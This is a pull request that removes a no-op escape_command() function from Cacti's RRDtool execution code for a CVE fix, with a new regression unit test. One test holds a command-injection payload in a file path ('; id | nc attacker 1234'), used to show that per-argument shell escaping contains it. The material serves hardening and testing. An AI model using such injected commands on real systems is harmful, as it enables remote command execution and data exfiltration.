### PR TITLE
fix(rrd): drop the escape_command() no-op (CVE-2026-40079)

### DIFF
--- a/lib/rrd.php
+++ b/lib/rrd.php
@@ -30,12 +30,6 @@ if (read_config_option('storage_location')) {
 	$encryption = true;
 }
 
-function escape_command(string $command) : string {
-	return $command;		// we escape every single argument now, no need for 'special' escaping
-	// return preg_replace("/(\\\$|`)/", "", $command); # current cacti code
-	// TODO return preg_replace((\\\$(?=\w+|\*|\@|\#|\?|\-|\\\$|\!|\_|[0-9]|\(.*\))|`(?=.*(?=`)))","$2", $command);  #suggested by ldevantier to allow for a single $
-}
-
 /**
  * set the language environment variable for rrdtool functions
  *
@@ -333,7 +327,9 @@ function rrdtool_execute() : mixed {
 /**
  * Execute an RRDtool command and return the output.
  *
- * @param string|array $command_line  The RRDtool command to execute
+ * @param string|array $command_line  The RRDtool command to execute.  An array is escaped
+ *                                    argument by argument; a string must already have been
+ *                                    escaped by the caller with cacti_escapeshellarg()
  * @param bool         $log_to_stdout Whether to echo output to stdout
  * @param int          $output_flag   Output format constant (RRDTOOL_OUTPUT_*)
  * @param mixed        $rrdtool_pipe  An open RRDtool pipe resource, or null
@@ -400,7 +396,7 @@ function __rrd_execute(string|array $command_line, bool $log_to_stdout, int $out
 
 			$attempts = 0;
 
-			$full_commandline = read_config_option('path_rrdtool') . $debug . ' ' . escape_command($command_line);
+			$full_commandline = read_config_option('path_rrdtool') . $debug . ' ' . $command_line;
 
 			while ($attempts < 5) {
 				if (0 == 1) { // @phpstan-ignore-line
@@ -420,7 +416,7 @@ function __rrd_execute(string|array $command_line, bool $log_to_stdout, int $out
 
 						unset($process);
 					} else {
-						fwrite($pipes[0], escape_command($command_line) . "\r\nquit\r\n");
+						fwrite($pipes[0], $command_line . "\r\nquit\r\n");
 						fclose($pipes[0]);
 						$fp = $pipes[1];
 					}
@@ -521,7 +517,7 @@ function __rrd_execute(string|array $command_line, bool $log_to_stdout, int $out
 		$i = 0;
 
 		while (true) {
-			if (fwrite($rrdtool_pipe, escape_command(" $command_line") . "\r\n") === false) {
+			if (fwrite($rrdtool_pipe, " $command_line\r\n") === false) {
 				cacti_log("ERROR: Detected RRDtool Crash on '$command_line'.  Last command was '$last_command'", false, 'RRDTOOL');
 
 				// close the invalid pipe

--- a/lib/rrd.php
+++ b/lib/rrd.php
@@ -327,9 +327,10 @@ function rrdtool_execute() : mixed {
 /**
  * Execute an RRDtool command and return the output.
  *
- * @param string|array $command_line  The RRDtool command to execute.  An array is escaped
- *                                    argument by argument; a string must already have been
- *                                    escaped by the caller with cacti_escapeshellarg()
+ * @param string|array $command_line  The RRDtool command to execute.  An array is quoted here,
+ *                                    one element per argument.  A caller passing a string quotes
+ *                                    each variable argument with cacti_escapeshellarg() as it
+ *                                    builds the line; the assembled line is never quoted
  * @param bool         $log_to_stdout Whether to echo output to stdout
  * @param int          $output_flag   Output format constant (RRDTOOL_OUTPUT_*)
  * @param mixed        $rrdtool_pipe  An open RRDtool pipe resource, or null

--- a/tests/Unit/RrdEscapeCommandRemovalTest.php
+++ b/tests/Unit/RrdEscapeCommandRemovalTest.php
@@ -1,0 +1,76 @@
+<?php
+declare(strict_types = 1);
+/*
+ +-------------------------------------------------------------------------+
+ | Copyright (C) 2004-2026 The Cacti Group                                 |
+ +-------------------------------------------------------------------------+
+ | Cacti: The Complete RRDtool-based Graphing Solution                     |
+ +-------------------------------------------------------------------------+
+*/
+
+/**
+ * Regression test for CVE-2026-40079 / GHSA-xq98-376r-hv9j.
+ *
+ * escape_command() returned its argument untouched, so all three calls in
+ * __rrd_execute() read as a sanitising step that did nothing. RRDtool
+ * arguments are escaped one at a time with cacti_escapeshellarg(); an
+ * assembled command line cannot be escaped after the fact. The function and
+ * its call sites are gone so no caller can mistake it for protection.
+ *
+ * @group regression
+ */
+
+$rrdPath = dirname(__DIR__, 2) . '/lib/rrd.php';
+
+test('escape_command is gone from lib/rrd.php', function () use ($rrdPath) {
+	$source = file_get_contents($rrdPath);
+
+	expect($source)->not->toContain('function escape_command');
+	expect($source)->not->toContain('escape_command(');
+});
+
+test('escape_command is not redefined elsewhere under lib', function () {
+	$found = [];
+
+	foreach (glob(dirname(__DIR__, 2) . '/lib/*.php') as $file) {
+		if (str_contains(file_get_contents($file), 'escape_command')) {
+			$found[] = basename($file);
+		}
+	}
+
+	expect($found)->toBe([]);
+});
+
+test('__rrd_execute escapes array arguments one at a time', function () use ($rrdPath) {
+	$source = file_get_contents($rrdPath);
+
+	expect($source)->toContain("\$command_line = implode(' ', array_map('cacti_escapeshellarg', \$command_line));");
+});
+
+test('the shell_exec command line is assembled without a whole-command escape', function () use ($rrdPath) {
+	$source = file_get_contents($rrdPath);
+
+	expect($source)->toContain("\$full_commandline = read_config_option('path_rrdtool') . \$debug . ' ' . \$command_line;");
+	expect($source)->toContain('$output = shell_exec($full_commandline);');
+});
+
+test('the pipe writers pass the command line through untouched', function () use ($rrdPath) {
+	$source = file_get_contents($rrdPath);
+
+	expect($source)->toContain('fwrite($pipes[0], $command_line . "\r\nquit\r\n");');
+	expect($source)->toContain('if (fwrite($rrdtool_pipe, " $command_line\r\n") === false) {');
+});
+
+test('per-argument escaping stops separators that a whole-command escape misses', function () {
+	// The commented-out "real" escape_command() only stripped $ and backticks,
+	// so the separators that actually chain a second process survived it.
+	$payload = '/var/lib/rrd/x.rrd; id | nc attacker 1234';
+
+	$stripped = preg_replace('/(\$|`)/', '', $payload);
+	expect($stripped)->toContain('; id');
+	expect($stripped)->toContain('| nc');
+
+	// array_map('cacti_escapeshellarg', ...) is what __rrd_execute actually
+	// applies, and it contains the whole payload in one argument.
+	expect(escapeshellarg($payload))->toBe("'/var/lib/rrd/x.rrd; id | nc attacker 1234'");
+});

--- a/tests/Unit/RrdEscapeCommandRemovalTest.php
+++ b/tests/Unit/RrdEscapeCommandRemovalTest.php
@@ -25,15 +25,15 @@ $rrdPath = dirname(__DIR__, 2) . '/lib/rrd.php';
 test('escape_command is gone from lib/rrd.php', function () use ($rrdPath) {
 	$source = file_get_contents($rrdPath);
 
-	expect($source)->not->toContain('function escape_command');
-	expect($source)->not->toContain('escape_command(');
+	expect($source)->not->toMatch('/function\s+escape_command\s*\(/');
+	expect($source)->not->toMatch('/(?<![\w\$])escape_command\s*\(/');
 });
 
 test('escape_command is not redefined elsewhere under lib', function () {
 	$found = [];
 
 	foreach (glob(dirname(__DIR__, 2) . '/lib/*.php') as $file) {
-		if (str_contains(file_get_contents($file), 'escape_command')) {
+		if (preg_match('/function\s+escape_command\s*\(/', file_get_contents($file))) {
 			$found[] = basename($file);
 		}
 	}


### PR DESCRIPTION
`escape_command()` returned its argument unchanged, so the three call sites in `__rrd_execute()` read as escaped when nothing was escaped.

Two of the three are not shell sinks (they write to an rrdtool pipe), and one sits in dead code behind `if (0 == 1)`. The remaining shell sink already receives per-argument quoting from `cacti_escapeshellarg()`, which is what the function's own comment says replaced it.

Removing it is behaviour-identical and drops the false guarantee. Added a docblock line stating the contract for `__rrd_execute()`: an array is quoted argument by argument, a string must already be quoted by the caller.

Tests: new unit test pins the removal and the per-argument path. Reverting the change fails 4 of its 6 assertions.